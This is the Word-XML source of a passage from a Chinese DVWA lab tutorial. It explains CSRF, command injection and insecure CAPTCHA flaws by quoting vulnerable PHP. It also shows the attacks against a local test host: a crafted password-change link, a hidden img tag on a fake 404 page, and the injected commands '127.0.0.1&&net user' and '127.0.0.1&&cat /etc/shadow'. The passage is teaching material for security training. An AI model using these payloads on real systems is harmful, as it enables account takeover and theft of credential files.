          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        $result = mysql_query( $insert ) </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t> die( '&lt;pre&gt;' . mysql_error() . '&lt;/pre&gt;'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the user </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        echo "&lt;pre&gt;Password Chang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Issue with passwords matching </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        echo "&lt;pre&gt;Passwords did not match.&lt;/pre&gt;";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 xml:space="preserve"> 可以看到，服务器收到修改密码的请求后，会检查参数password_new与password_conf是否相同，如果相同，就会修改密码，并没有任何的防CSRF机制（当然服务器对请求的发送者是做了身份验证的，是检查的cookie，只是这里的代码没有体现= =）。 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>漏洞利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1、构造链接</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A) 最基础的:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="004D4162" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId32" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
          <w:rPr>
            <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://192.168.153.130/dvwa/vulnerabilities/csrf/?password_new=password&amp;password_conf=password&amp;Change=Change#</w:t>
        </w:r>
      </w:hyperlink>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当受害者点击了这个链接，他的密码就会被改成password（这种攻击显得有些拙劣，链接一眼就能看出来是改密码的，而且受害者点了链接之后看到这个页面就会知道自己的密码被篡改了）</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5DFADB73" wp14:editId="7BC1A25D">
            <wp:extent cx="5244861" cy="3484778"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="26" name="图片 26" descr="1.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014" cy="3484880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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需要注意的是，CSRF最关键的是利用受害者的cookie向服务器发送伪造请求，所以如果受害者之前用Chrome浏览器登录的这个系统，而用搜狗浏览器点击这个链接，攻击是不会触发的，因为搜狗浏览器并不能利用Chrome浏览器的cookie，所以会自动跳转到登录界面。</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4E7ED6F3" wp14:editId="73090A35">
            <wp:extent cx="5279366" cy="3501923"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="25" name="图片 25" descr="1.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519" cy="350202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有人会说，这个链接也太明显了吧，不会有人点的，没错，所以真正攻击场景下，我们需要对链接做一些处理。</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lastRenderedPageBreak/>
        <w:t>B) 我们可以使用短链接来隐藏URL（点击短链接，会自动跳转到真实网站）：</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如</w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://dwz.cn/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>****</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CD97C9B" wp14:editId="7E8E08C4">
            <wp:extent cx="5270740" cy="4019910"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="24" name="图片 24" desc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01" cy="402018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因为本地搭的环境，服务器域名是ip所以无法生成相应的短链接= =，实际攻击场景下只要目标服务器的域名不是ip，是可以生成相应短链接的。</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29F34BD4" wp14:editId="75B0CAF8">
            <wp:extent cx="5218981" cy="3873260"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="23" name="图片 23" descr="1.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304" cy="3873500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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需要提醒的是，虽然利用了短链接隐藏url，但受害者最终还是会看到密码修改成功的页面，所以这种攻击方法也并不高明。</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C) 构造攻击页面</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现实攻击场景下，这种方法需要事先在公网上传一个攻击页面，诱骗受害者去访问，真正能够在受害者不知情的情况下完成CSRF攻击。这里为了方便演示（才不是我租不起服务器= =），就在本地写一个test.html，下面是具体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w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> src="http://192.168.153.130/dvwa/vulnerabilities/csrf/?password_new=hack&amp;password_conf=hack&amp;Change=Change#" border="0" style="display:none;"/&gt;</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w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>h1</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>&gt;404&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>h1</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>&gt;</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w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>h2</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>&gt;file not found.&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>h2</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>&g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当受害者访问test.html时，会误认为是自己点击的是一个失效的url，但实际上已经遭受了CSRF攻击，密码已经被修改为了hack。</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A678CD3" wp14:editId="11923087">
            <wp:extent cx="5184475" cy="3588280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="图片 22" descr="1.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627" cy="3588385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="009655A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Command Injection</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Command Injection，即命令注入，是指通过提交恶意构造的参数破坏命令语句结构，从而达到执行恶意命令的目的。PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一，国内著名的Web应用程序Discuz!、DedeCMS等都曾经存在过该类型漏洞。</w:t>
      </w:r>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305C7586" wp14:editId="66155E49">
            <wp:extent cx="5348378" cy="2527227"/>
            <wp:effectExtent l="0" t="0" r="5080" b="6985"/>
            <wp:docPr id="34" name="图片 34" descr="图片2.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2.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8533" cy="2527300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面将对Low级别的代码进行分析。</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服务器端核心代码</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lt;?php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2"/>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve">( isset( </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="hljs-variable"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>$_POST</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve">[ </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>'Submit'</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> ]  ) )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Get input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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="hljs-variable"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>$target</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="hljs-variable"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>$_REQUEST</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve">[ </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>'ip'</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve">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Determine OS and execute the ping command.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keyword"/>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve">( stristr( php_uname( </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>'s'</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> ), </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>'Windows NT'</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) )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Windows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variable"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>$cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> = shell_</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="hljs-builtin"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>'ping  '</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="hljs-variable"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>$target</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve">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keyword"/>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve">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nix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variable"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>$cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> = shell_</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="hljs-builtin"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>'ping  -c 4 '</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="hljs-variable"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>$target</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve">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 Feedback </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> the end user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builtin"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>"&lt;pre&gt;{</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="hljs-variable"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>$cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>}&lt;/pre&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>;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w:t>
      </w:r>
    </w:p>
    <w:p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gt; </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相关函数介绍 </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i/>
          <w:iCs/>
        </w:rPr>
        <w:t>stristr(string,search,before_search)</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stristr函数搜索字符串在另一字符串中的第一次出现，返回字符串的剩余部分（从匹配点），如果未找到所搜索的字符串，则返回 FALSE。参数string规定被搜索的字符串，参数search规定要搜索的字符串（如果该参数是数字，则搜索匹配该数字对应的 ASCII 值的字符），可选参数before_true为布尔型，默认为“false” ，如果设置为 “true”，函数将返回 search 参数第一次出现之前的字符串部分。</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i/>
          <w:iCs/>
        </w:rPr>
        <w:t>php_uname(mode)</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这个函数会返回运行php的操作系统的相关描述，参数mode可取值”a” （此为默认，包含序列”s n r v m”里的所有模式），”s ”（返回操作系统名称），”n”（返回主机名），” r”（返回版本名称），”v”（返回版本信息）， ”m”（返回机器类型）。</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可以看到，服务器通过判断操作系统执行不同ping命令，但是对ip参数并未做任何的过滤，导致了严重的命令注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="200" w:firstLine="482"/>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>漏洞利用</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lastRenderedPageBreak/>
        <w:t>window和linux系统都可以用&amp;&amp;来执行多条命令</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127.0.0.1&amp;&amp;net user</w:t>
      </w:r>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5CCEF0BB" wp14:editId="09F62A73">
            <wp:extent cx="5244861" cy="3864461"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="33" name="图片 33" descr="图片3.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3.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063" cy="3864610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Linux下输入127.0.0.1&amp;&amp;cat /etc/shadow甚至可以读取shadow文件，可见危害之大。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="009655A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Insecure CAPTCHA</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Insecure CAPTCHA，意思是不安全的验证码，CAPTCHA是Completely Automated Public Turing Test to Tell Computers and Humans Apart (全自动区分计算机和人类的图灵测试)的简称。但个人觉得，这一模块的内容叫做不安全的验证流程更妥当些，因为这块主要是验证流程出现了逻辑漏洞，谷歌的验证码表示不背这个锅。</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43C74290" wp14:editId="4E515E69">
            <wp:extent cx="5003321" cy="3398421"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="91" name="图片 91" descr="1.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3466" cy="339852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reCAPTCHA验证流程</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这一模块的验证码使用的是Google提供reCAPTCHA服务，下图是验证的具体流程。</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29FC2A7" wp14:editId="65FB58B5">
            <wp:extent cx="4968815" cy="3364132"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
            <wp:docPr id="90" name="图片 90" descr="1.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959" cy="336423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通过调用recaptcha_check_answer函数检查用户输入的正确性。</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i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>recaptcha_check_answer($privkey,$remoteip, $challenge,$response)</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参数$privkey是服务器申请的private key ，$remoteip是用户的ip，$challenge 是recaptcha_challenge_field 字段的值，来自前端页面 ，</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$response是 recaptcha_response_field 字段的值。函数返回ReCaptchaResponse class的实例，ReCaptchaResponse 类有2个属性 ：</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is_valid是布尔型的，表示校验是否有效，</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error是返回的错误代码。</w:t>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POST[ 'Change' ] ) &amp;&amp; ( $_POST[ 'step' ] == '1' ) ) { </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    // Hide the CAPTCHA form </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
